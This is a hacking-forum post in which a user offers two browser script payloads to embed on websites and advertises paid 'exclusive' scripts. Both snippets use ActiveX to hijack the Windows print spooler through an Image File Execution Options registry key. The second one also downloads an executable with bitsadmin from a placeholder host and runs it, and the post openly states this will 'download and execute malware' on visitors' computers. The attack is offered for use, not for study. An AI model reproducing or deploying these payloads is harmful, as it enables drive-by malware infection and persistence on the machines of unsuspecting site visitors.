hacxx
Member
- Joined
- 25 Mar 2021
- Messages
- 748
- Reaction score
- 54
- Points
- 48
Here something to start with...
ONLY Internet Explorer older versions
THE CODE BELOW IS THE ONE YOU SHOULD USE ON YOUR WEBSITE AND EVERYTIME A INTERNET EXPLORER VIEW THE SITE IT WILL DOWNLOAD AND EXECUTE MALWARE ON ANY COMPUTER WITH A PRINTER (SPOOLSV.EXE)
ONLY Internet Explorer older versions + Download and execute. (Easy detectable)
You should buy my "Hacxx Latest Scripts" you get exclusive code offers.
ONLY Internet Explorer older versions
Code:
<script>var denial = 'User32.dll,MessageBoxA'; var Shell = new ActiveXObject('WScript.Shell'); Shell.RegWrite('HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spoolsv.exe',denial);</script>
THE CODE BELOW IS THE ONE YOU SHOULD USE ON YOUR WEBSITE AND EVERYTIME A INTERNET EXPLORER VIEW THE SITE IT WILL DOWNLOAD AND EXECUTE MALWARE ON ANY COMPUTER WITH A PRINTER (SPOOLSV.EXE)
ONLY Internet Explorer older versions + Download and execute. (Easy detectable)
Code:
<script>var denial = 'cmd.exe /c bitsadmin /transfer Kunami /download /priority high http://127.0.0.1/1.exe c:\windows\temp\calc.exe & start c:\windows\temp\calc.exe'; var Shell = new ActiveXObject('WScript.Shell'); Shell.RegWrite('HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spoolsv.exe',denial);</script>
You should buy my "Hacxx Latest Scripts" you get exclusive code offers.